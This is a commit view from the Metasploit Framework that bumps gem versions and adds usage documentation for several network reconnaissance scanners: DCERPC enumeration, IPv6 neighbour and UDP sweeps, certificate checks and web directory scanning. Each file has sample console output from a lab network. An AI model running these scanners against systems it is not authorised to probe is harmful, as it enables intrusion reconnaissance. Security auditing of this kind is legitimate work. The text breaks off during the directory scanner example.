Merge branch 'goliath' into MS-2909

GSoC/Meterpreter_Web_Console
James Barnett 2018-03-02 16:32:55 -06:00
commit b42c3ff654
38 changed files with 1328 additions and 61 deletions

View File

@ -27,6 +27,10 @@ group :development do
'x86-mingw32', 'x64-mingw32', 'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux', 'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin')) 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'google-protobuf', "3.5.1" if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end end
group :development, :test do group :development, :test do

View File

@ -131,7 +131,7 @@ GEM
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.5) fivemat (1.3.5)
google-protobuf (3.5.1.2) google-protobuf (3.5.1)
googleapis-common-protos-types (1.0.1) googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0) google-protobuf (~> 3.0)
googleauth (0.6.2) googleauth (0.6.2)
@ -268,7 +268,7 @@ GEM
metasm metasm
rex-arch rex-arch
rex-text rex-text
rex-exploitation (0.1.16) rex-exploitation (0.1.17)
jsobfu jsobfu
metasm metasm
rex-arch rex-arch

View File

@ -0,0 +1,117 @@
## Description
The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
## Verification Steps
1. Do: ```use auxiliary/scanner/dcerpc/endpoint_mapper```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
### Example Windows 2003, and Windows 7 Targets
```
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
msf auxiliary(endpoint_mapper) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(endpoint_mapper) > set THREADS 55
threads => 55
msf auxiliary(endpoint_mapper) > run
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
...snip...
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 LRPC (W32TIME_ALT) [WinHttp Auto-Proxy Service]
[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 PIPE (\PIPE\W32TIME_ALT) \\XEN-2K3-BARE [WinHttp Auto-Proxy Service]
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
[*] Could not connect to the endpoint mapper service
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (audit)
[*] Connecting to the endpoint mapper service...
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (securityevent)
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (protected_storage)
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (dsrole)
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 TCP (1025) 192.168.1.204
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (audit) [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (securityevent) [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (protected_storage) [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (dsrole) [IPSec Policy agent endpoint]
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 TCP (1025) 192.168.1.204 [IPSec Policy agent endpoint]
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (wzcsvc)
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (wzcsvc)
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (wzcsvc)
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (DNSResolver) [DHCP Client LRPC Endpoint]
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 TCP (49152) 192.168.1.202
[*] 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 LRPC (LRPC-71ea8d8164d4fa6391)
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc05FBE22)
[*] 12e65dd8-887f-41ef-91bf-8d816c42c2e7 v1.0 LRPC (WMsgKRpc05FBE22) [Secure Desktop LRPC interface]
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0)
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (trkwks)
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (RemoteDevicesLPC_API)
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (TSUMRPD_PRINT_DRV_LPC_API)
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0) [PcaSvc]
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE [PcaSvc]
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (trkwks) [PcaSvc]
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (RemoteDevicesLPC_API) [PcaSvc]
...snip...
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 LRPC (eventlog) [Event log TCPIP]
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Event log TCPIP]
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 TCP (49153) 192.168.1.202 [Event log TCPIP]
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (eventlog) [NRP server endpoint]
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [NRP server endpoint]
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 TCP (49153) 192.168.1.202 [NRP server endpoint]
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (AudioClientRpc) [NRP server endpoint]
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (Audiosrv) [NRP server endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (eventlog) [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 TCP (49153) 192.168.1.202 [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (AudioClientRpc) [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (Audiosrv) [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (eventlog) [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 TCP (49153) 192.168.1.202 [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (AudioClientRpc) [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (Audiosrv) [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc) [DHCPv6 Client LRPC Endpoint]
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc6) [DHCPv6 Client LRPC Endpoint]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (eventlog) [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 TCP (49153) 192.168.1.202 [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (AudioClientRpc) [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (Audiosrv) [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc) [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc6) [Security Center]
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (OLE7F5D2071B7D4441897C08153F2A2) [Security Center]
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc045EC1)
[*] c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 v1.0 LRPC (LRPC-af541be9090579589d) [Impl friendly name]
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc0441F0)
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WindowsShutdown)
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WMsgKRpc0441F0)
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WindowsShutdown)
[*] Could not connect to the endpoint mapper service
[*] Scanned 06 of 55 hosts (010% complete)
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(endpoint_mapper) >
```

View File

@ -0,0 +1,62 @@
## Description
The hidden scanner connects to a given range of IP addresses and tries to locate any RPC services that are not listed in the Endpoint Mapper and determines if anonymous access to the service is allowed.
## Verification Steps
1. Do: ```use auxiliary/scanner/dcerpc/hidden```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/dcerpc/hidden
msf auxiliary(hidden) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(hidden) > set THREADS 55
THREADS => 55
msf auxiliary(hidden) > run
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
...snip...
[*] Connecting to the endpoint mapper service...
[*] Connecting to the endpoint mapper service...
[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
[*] Could not contact the endpoint mapper on 192.168.1.203
[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
[*] Could not contact the endpoint mapper on 192.168.1.201
[*] Could not connect to the endpoint mapper service
[*] Could not contact the endpoint mapper on 192.168.1.250
[*] Looking for services on 192.168.1.204:1025...
[*] HIDDEN: UUID 12345778-1234-abcd-ef00-0123456789ab v0.0
[*] Looking for services on 192.168.1.202:49152...
[*] CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr
[*]
[*] HIDDEN: UUID c681d488-d850-11d0-8c52-00c04fd90f7e v1.0
[*] CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr
[*]
[*] HIDDEN: UUID 11220835-5b26-4d94-ae86-c3e475a809de v1.0
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
[*]
[*] HIDDEN: UUID 5cbe92cb-f4be-45c9-9fc9-33e73e557b20 v1.0
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
[*]
[*] HIDDEN: UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0
[*] CONN BIND CALL DATA=0000000057000000
[*]
[*] HIDDEN: UUID 1cbcad78-df0b-4934-b558-87839ea501c9 v0.0
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
[*]
[*] HIDDEN: UUID c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
[*]
[*] Remote Management Interface Error: The connection timed out (192.168.1.202:49152).
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(hidden) >
```

View File

@ -0,0 +1,87 @@
## Description
The dcerpc/management module scans a range of IP addresses and obtains information from the Remote Management interface of the DCERPC service.
## Verification Steps
1. Do: ```use auxiliary/scanner/dcerpc/management```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
### Example Windows 2003, and Windows 7 Targets
```
msf > use auxiliary/scanner/dcerpc/management
msf auxiliary(management) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(management) > set THREADS 55
THREADS => 55
msf auxiliary(management) > run
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
[*] UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
[*] Remote Management Interface Error: The connection was refused by the remote host (192.168.1.250:135).
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.1
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 1d55b526-c137-46c5-ab79-638f2a68e869 v1.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID e60c73e6-88f9-11cf-9af1-0020af6e72f4 v2.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 99fcfec4-5260-101b-bbcb-00aa0021347a v0.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID b9e79e60-3d52-11ce-aaa1-00006901293f v0.2
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 412f241e-c12a-11ce-abff-0020af6e7a17 v0.2
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 00000136-0000-0000-c000-000000000046 v0.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID c6f3ee72-ce7e-11d1-b71e-00c04fc3111a v1.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 v0.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
[*] UUID 000001a0-0000-0000-c000-000000000046 v0.0
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
[*] listening: 00000000
[*] killed: 00000005
[*] name: 00010000000000000100000000000000d3060000
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(management) >
```

View File

@ -0,0 +1,43 @@
## Description
The dcerpc/tcp_dcerpc_auditor module scans a range of IP addresses to determine what DCERPC services are available over a TCP port.
## Verification Steps
1. Do: ```use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
### Example Windows 2003, and Windows 7 Targets
```
msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
msf auxiliary(tcp_dcerpc_auditor) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(tcp_dcerpc_auditor) > set THREADS 55
THREADS => 55
msf auxiliary(tcp_dcerpc_auditor) > run
The connection was refused by the remote host (192.168.1.250:135).
The host (192.168.1.210:135) was unreachable.
...snip...
The host (192.168.1.200:135) was unreachable.
[*] Scanned 38 of 55 hosts (069% complete)
...snip...
The host (192.168.1.246:135) was unreachable.
192.168.1.203 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
192.168.1.201 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
192.168.1.204 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000076070000
192.168.1.202 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
192.168.1.204 - UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA 135 ACCESS GRANTED 000002000b0000000b00000004000200080002000c0002001000020014000200180002001c0002002000020024000200280002002c0002000883afe11f5dc91191a408002b14a0fa0300000084650a0b0f9ecf11a3cf00805f68cb1b0100010026b5551d37c1c546ab79638f2a68e86901000000e6730ce6f988cf119af10020af6e72f402000000c4fefc9960521b10bbcb00aa0021347a00000000609ee7b9523dce11aaa100006901293f000002001e242f412ac1ce11abff0020af6e7a17000002003601000000000000c0000000000000460000000072eef3c67eced111b71e00c04fc3111a01000000b84a9f4d1c7dcf11861e0020af6e7c5700000000a001000000000000c0000000000000460000000000000000
192.168.1.204 - UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa 3.0 OPEN VIA 135 ACCESS GRANTED d8060000
[*] Scanned 52 of 55 hosts (094% complete)
[*] Scanned 54 of 55 hosts (098% complete)
The connection timed out (192.168.1.205:135).
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp_dcerpc_auditor) >
```

View File

@ -0,0 +1,50 @@
## Description
This auxiliary module probes the local network for IPv6 hosts that respond to Neighbor Solicitations with a link-local address. This module, like the arp_sweep one, will generally only work within the attacking machines broadcast domain. It serves the dual-purpose of showing what hosts are online similar to arp_sweep and then performs the IPv6 Neighbor Discovery.
## Verification Steps
1. Do: ```use auxiliary/scanner/discovery/ipv6_neighbor```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set SHOST [IP]```
4. Do: ```set SMAC [MAC]```
5. Do: ```set THREADS [number of threads]```
6. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/discovery/ipv6_neighbor
msf auxiliary(ipv6_neighbor) > set RHOSTS 192.168.1.2-254
RHOSTS => 192.168.1.200-254
msf auxiliary(ipv6_neighbor) > set SHOST 192.168.1.101
SHOST => 192.168.1.101
msf auxiliary(ipv6_neighbor) > set SMAC d6:46:a7:38:15:65
SMAC => d6:46:a7:38:15:65
msf auxiliary(ipv6_neighbor) > set THREADS 55
THREADS => 55
msf auxiliary(ipv6_neighbor) > run
[*] IPv4 Hosts Discovery
[*] 192.168.1.10 is alive.
[*] 192.168.1.11 is alive.
[*] 192.168.1.2 is alive.
[*] 192.168.1.69 is alive.
[*] 192.168.1.109 is alive.
[*] 192.168.1.150 is alive.
[*] 192.168.1.61 is alive.
[*] 192.168.1.201 is alive.
[*] 192.168.1.203 is alive.
[*] 192.168.1.205 is alive.
[*] 192.168.1.206 is alive.
[*] 192.168.1.99 is alive.
[*] 192.168.1.97 is alive.
[*] 192.168.1.250 is alive.
[*] IPv6 Neighbor Discovery
[*] 192.168.1.69 maps to IPv6 link local address fe80::5a55:caff:fe14:1e61
[*] 192.168.1.99 maps to IPv6 link local address fe80::5ab0:35ff:fe6a:4ecc
[*] 192.168.1.97 maps to IPv6 link local address fe80::7ec5:37ff:fef9:a96a
[*] Scanned 253 of 253 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ipv6_neighbor) >
```

View File

@ -0,0 +1,42 @@
## Description
The `udp_sweep` module scans across a given range of hosts to detect commonly available UDP services.
## Verification Steps
1. Do: ```use auxiliary/scanner/discovery/udp_sweep```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(udp_sweep) > set RHOSTS 192.168.1.2-254
RHOSTS => 192.168.1.2-254
msf auxiliary(udp_sweep) > set THREADS 253
THREADS => 253
msf auxiliary(udp_sweep) > run
[*] Sending 10 probes to 192.168.1.2->192.168.1.254 (253 hosts)
[*] Discovered NetBIOS on 192.168.1.109:137 (SAMSUNG::U :SAMSUNG::U :00:15:99:3f:40:bd)
[*] Discovered NetBIOS on 192.168.1.150:137 (XEN-WIN7-PROD::U :WORKGROUP::G :XEN-WIN7-PROD::U :WORKGROUP::G :aa:e3:27:6e:3b:a5)
[*] Discovered NetBIOS on 192.168.1.203:137 (XEN-XP-SPLOIT::U :WORKGROUP::G :XEN-XP-SPLOIT::U :WORKGROUP::G :3e:ff:3c:4c:89:67)
[*] Discovered NetBIOS on 192.168.1.201:137 (XEN-XP-SP2-BARE::U :HOTZONE::G :XEN-XP-SP2-BARE::U :HOTZONE::G :HOTZONE::U :__MSBROWSE__::G :c6:ce:4e:d9:c9:6e)
[*] Discovered NetBIOS on 192.168.1.206:137 (XEN-XP-PATCHED::U :XEN-XP-PATCHED::U :HOTZONE::G :HOTZONE::G :12:fa:1a:75:b8:a5)
[*] Discovered NetBIOS on 192.168.1.250:137 (FREENAS::U :FREENAS::U :FREENAS::U :__MSBROWSE__::G :WORKGROUP::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00)
[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
[*] Discovered NTP on 192.168.1.69:123 (NTP v4)
[*] Discovered NTP on 192.168.1.99:123 (NTP v4)
[*] Discovered NTP on 192.168.1.201:123 (Microsoft NTP)
[*] Discovered NTP on 192.168.1.203:123 (Microsoft NTP)
[*] Discovered NTP on 192.168.1.206:123 (Microsoft NTP)
[*] Discovered MSSQL on 192.168.1.206:1434 (ServerName=XEN-XP-PATCHED InstanceName=SQLEXPRESS IsClustered=No Version=9.00.4035.00 tcp=1050 np=\\XEN-XP-PATCHED\pipe\MSSQL$SQLEXPRESS\sql\query )
[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
[*] Scanned 253 of 253 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(udp_sweep) >
```

View File

@ -0,0 +1,76 @@
## Description
This module is a useful administrative scanner that allows you to cover a subnet to check whether or not server http certificates are expired. Using this scanner, you can uncover issuer of certificate, issue and expiry date.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/cert```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/cert
msf auxiliary(cert) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(cert) > set THREADS 254
THREADS => 254
msf auxiliary(cert) > run
[*] 192.168.1.11 - '192.168.1.11' : 'Sat Sep 25 07:16:02 UTC 2010' - 'Tue Sep 22 07:16:02 UTC 2020'
[*] 192.168.1.10 - '192.168.1.10' : 'Wed Mar 10 00:13:26 UTC 2010' - 'Sat Mar 07 00:13:26 UTC 2020'
[*] 192.168.1.201 - 'localhost' : 'Tue Nov 10 23:48:47 UTC 2009' - 'Fri Nov 08 23:48:47 UTC 2019'
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(cert) >
```
## Confirming
The following are other industry tools which can also be used. Note that the targets are not the same as those used in the previous documentation.
### [nmap](https://nmap.org/nsedoc/scripts/ssl-cert.html)
```
# nmap -p 443 192.168.2.137 -sV --script=ssl-cert
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-24 13:20 EST
Nmap scan report for ubuntu (192.168.2.137)
Host is up (0.0029s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-01-26T21:38:21
| Not valid after: 2028-01-24T21:38:21
| MD5: d2a7 364d 636a 6eee c3e1 7af9 05f7 8c5b
|_SHA-1: a5bf f783 2514 90ee 365a 3ee4 9b6c 23f6 24af dbfa
MAC Address: 00:0C:29:5B:CF:75 (VMware)
```
### [sslscan](https://github.com/rbsec/sslscan)
```
# sslscan 192.168.2.137
Version: 1.11.11-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)
Connected to 192.168.2.137
Testing SSL server 192.168.2.137 on port 443 using SNI name 192.168.2.137
```
...snip...
```
Subject: ubuntu
Issuer: ubuntu
Not valid before: Jan 26 21:38:21 2018 GMT
Not valid after: Jan 24 21:38:21 2028 GMT
```

View File

@ -0,0 +1,68 @@
## Description
This module scans one or more web servers for interesting directories that can be further explored.
## Verfication Steps
1. Do: ```use auxiliary/scanner/http/dir_scanner```
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(dir_scanner) > run
[*] Using code '404' as not found for 192.168.1.201
[*] Found http://192.168.1.201:80/.../ 403 (192.168.1.201)
[*] Found http://192.168.1.201:80/Joomla/ 200 (192.168.1.201)
[*] Found http://192.168.1.201:80/cgi-bin/ 403 (192.168.1.201)
[*] Found http://192.168.1.201:80/error/ 403 (192.168.1.201)
[*] Found http://192.168.1.201:80/icons/ 200 (192.168.1.201)
[*] Found http://192.168.1.201:80/oscommerce/ 200 (192.168.1.201)
